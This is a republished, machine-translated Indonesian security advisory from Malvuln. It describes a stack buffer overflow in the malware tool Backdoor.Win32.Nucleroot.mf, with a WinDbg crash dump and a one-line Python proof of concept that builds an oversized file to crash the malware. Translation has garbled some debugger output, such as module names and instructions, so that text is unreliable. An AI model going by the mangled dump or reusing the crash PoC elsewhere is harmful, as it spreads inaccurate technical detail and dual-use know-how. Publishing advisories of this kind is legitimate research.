Backdoor.Win32.Nucleroot.mf Buffer Overflow

  • Whatsapp
Backdoor.Win32.Nucleroot.mf Buffer Overflow
BackdoorWinNuclerootmf Buffer Overflow

News.nextcloud.asia

Penemuan / kredit: Malvuln – malvuln.com (c) 2021
Sumber asli: https://malvuln.com/advisory/8de56eef118187a89eeab972288ce94d.txt
Kontak: [email protected]
Media: twitter.com/malvuln

Ancaman: Backdoor.Win32.Nucleroot.mf
Kerentanan: Stack Buffer Overflow
Deskripsi: Deskripsi: MaskPE oleh yzkzero adalah alat untuk menanamkan pintu belakang di file PE yang ada. Alat Backdoor tidak memeriksa file yang dimuat dengan benar dan menjadi korban buffer overflow lokal berbasis file.
Jenis: PE32
MD5: 8de56eef118187a89eeab972288ce94d
ID Vuln: MVID-2021-0420
ASLR: Salah
DEP: Salah
SEH Aman: Benar
Pengungkapan: 12/11/2021

Pembuangan Memori:
(1790.60): Pelanggaran akses – kode c0000005 (kesempatan pertama/kedua tidak tersedia)
eax = 00000000 ebx = 00000000 ecx = 41414141 edx = 41414101 esi = 000000003 edi = 000000003
eip=7770ed3c esp=0019e7a8 ebp=0019e938 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
ntdll!ZwWaitForMultipleObjects+0xc:
7770ed3c c21400 ret 14 jam

0:00> .ecxr
eax=454e4141 ebx=771fb900 ecx=41414141 edx=41414101 esi=0019fbe8 edi=0019fbe8
eip = 004090e3 esp = 0019f0c8 ebp = 025a43e8 iopl = 0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
*** PERINGATAN: Tidak dapat memverifikasi checksum untuk Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
*** KESALAHAN: Pemuatan modul selesai tetapi simbol tidak dapat dimuat untuk Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
Pintu Belakang_Win32_Nucleroot_mf+0x90e3:
004090e3 813850450000 cmp dword ptr [eax],4550j ds:002b:454e4141=????????

0:00> !analisis -v
************************************************** ********************************
* *
* Analisis Pengecualian *
* *
************************************************** ********************************

KESALAHAN_IP:
Backdoor_Win32_Nucleroot_mf+90e3
004090e3 813850450000 cmp dword ptr [eax],4550j

EXCEPTION_RECORD: ffffffff — (.exr 0xffffffffffffffff)
ExceptionAddress: 004090e3 (Backdoor_Win32_Nucleroot_mf+0x000090e3)
ExceptionCode: c0000005 (Pelanggaran akses)
Bendera Pengecualian: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 454e4141
Mencoba membaca dari alamat 454e4141

PROCESS_NAME: Pintu Belakang.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d

ERROR_CODE: (NTSTATUS) 0xc0000005 – Instruksi pada 0x%p mereferensikan memori pada 0x%p. Memori tidak boleh %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 – Instruksi pada 0x%p mereferensikan memori pada 0x%p. Memori tidak boleh %s.

EXCEPTION_PARAMETER1: 00000000

PENGECUALIAN_PARAMETER2: 454e4141

READ_ADDRESS: 454e4141

TINDAK LANJUT_IP:
Backdoor_Win32_Nucleroot_mf+90e3
004090e3 813850450000 cmp dword ptr [eax],4550j

MOD_LIST:

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 00000060

BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141

TERAKHIR_CONTROL_TRANSFER: dari 004049b2 ke 004090e3

STACK_TEXT:
PERINGATAN: Informasi pelepasan tumpukan tidak tersedia. Bingkai berikut mungkin salah.
0019f0c8 004049b2 00000001 0019fb74 0019f438 Pintu Belakang_Win32_Nucleroot_mf+0x90e3
0019fc1c 77408654 000000b8 00000000 026a1600 Pintu Belakang_Win32_Nucleroot_mf+0x49b2
0042fba0 00403690 004012a0 00420e01 0042167d kernel32! BaseThreadInitThunk + 0x24
0042fba8 00420e01 0042167d 004255fe 0042565f Pintu Belakang_Win32_Nucleroot_mf+0x3690
0042fbac 0042167d 004255fe 0042565f 00425604 Pintu Belakang_Win32_Nucleroot_mf+0x20e01
0042fbb0 004255fe 0042565f 00425604 00425604 Pintu Belakang_Win32_Nucleroot_mf+0x2167d
0042fbb4 0042565f 00425604 00425604 00425607 Pintu Belakang_Win32_Nucleroot_mf+0x255fe
0042fbb8 00425604 00425604 00425607 004021b0 Pintu Belakang_Win32_Nucleroot_mf+0x2565f
0042fbbc 00425604 00425607 004021b0 00425664 Pintu Belakang_Win32_Nucleroot_mf+0x25604
0042fbc0 00425607 004021b0 00425664 00425615 Pintu Belakang_Win32_Nucleroot_mf+0x25604
0042fbc4 004021b0 00425664 00425615 00425659 Pintu Belakang_Win32_Nucleroot_mf+0x25607
0042fbc8 00425664 00425615 00425659 00421982 Pintu Belakang_Win32_Nucleroot_mf+0x21b0
0042fbcc 00425615 00425659 00421982 0042561b Pintu Belakang_Win32_Nucleroot_mf+0x25664
0042fbd0 00425659 00421982 0042561b 00425655 Pintu Belakang_Win32_Nucleroot_mf+0x25615
0042fbd4 00421982 0042561b 00425655 0042565f Pintu Belakang_Win32_Nucleroot_mf+0x25659
0042fbd8 0042561b 00425655 0042565f 0042565f Pintu Belakang_Win32_Nucleroot_mf+0x21982
0042fbdc 00425655 0042565f 0042565f 0042565f Pintu Belakang_Win32_Nucleroot_mf+0x2561b
0042fbe0 0042565f 0042565f 0042565f 00420d33 Pintu Belakang_Win32_Nucleroot_mf+0x25655
0042fbe4 0042565f 0042565f 00420d33 00422195 Pintu Belakang_Win32_Nucleroot_mf+0x2565f
0042fbe8 0042565f 00420d33 00422195 0042214c Pintu Belakang_Win32_Nucleroot_mf+0x2565f
0042fbec 00420d33 00422195 0042214c 00423e5e Pintu Belakang_Win32_Nucleroot_mf+0x2565f
0042fcec 00420d4d 00420d33 00690053 0065007a Pintu Belakang_Win32_Nucleroot_mf+0x20d33
0042fcf0 00420d33 00690053 0065007a 0066004f Pintu Belakang_Win32_Nucleroot_mf+0x20d4d
0042fcf4 00690053 0065007a 0066004f 006d0049 Pintu Belakang_Win32_Nucleroot_mf+0x20d33
0042fcf8 0065007a 0066004f 006d0049 00670061 0x690053
0042fcfc 0066004f 006d0049 00670061 00000065 0x65007a
0042fd00 006d0049 00670061 00000065 00610042 0x66004f
0042fd04 00670061 00000065 00610042 00650073 0x6d0049
0042fd08 00000000 00610042 00650073 0066004f 0x670061

STACK_COMMAND: ~0s; .ecxr ; kb

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: Pintu Belakang_Win32_Nucleroot_mf+90e3

FOLLOWUP_NAME: Pemilik Mesin

MODULE_NAME: Pintu Belakang_Win32_Nucleroot_mf

IMAGE_NAME: Pintu Belakang.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d

DEBUG_FLR_IMAGE_TIMESTAMP: 4456df74

FAILURE_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d!Tidak diketahui

BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_Backdoor_Win32_Nucleroot_mf+90e3

Eksploitasi / PoC:
python -c “print( ‘MZ’+’A’*20000)” > DOOM.exe

Penafian: Informasi yang terkandung dalam nasihat ini diberikan “sebagaimana adanya” tanpa jaminan atau jaminan kesesuaian penggunaan atau sebaliknya. Izin dengan ini diberikan untuk redistribusi nasihat ini, asalkan tidak diubah kecuali dengan memformat ulang, dan kredit yang diberikan diberikan. Izin secara eksplisit diberikan untuk penyisipan dalam database kerentanan dan sejenisnya, asalkan kredit jatuh tempo diberikan kepada penulis. Penulis tidak bertanggung jawab atas penyalahgunaan informasi yang terkandung di sini dan tidak bertanggung jawab atas segala kerusakan yang disebabkan oleh penggunaan atau penyalahgunaan informasi ini. Penulis melarang penggunaan berbahaya dari informasi terkait keamanan atau eksploitasi oleh penulis atau di tempat lain. Jangan mencoba mengunduh sampel Malware. Penulis situs web ini tidak bertanggung jawab atas segala jenis kerusakan yang terjadi akibat penanganan Malware yang tidak tepat atau pengunduhan APAPUN Malware yang disebutkan di situs web ini atau di tempat lain. Semua konten Hak Cipta (c) Malvuln.com (TM).

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.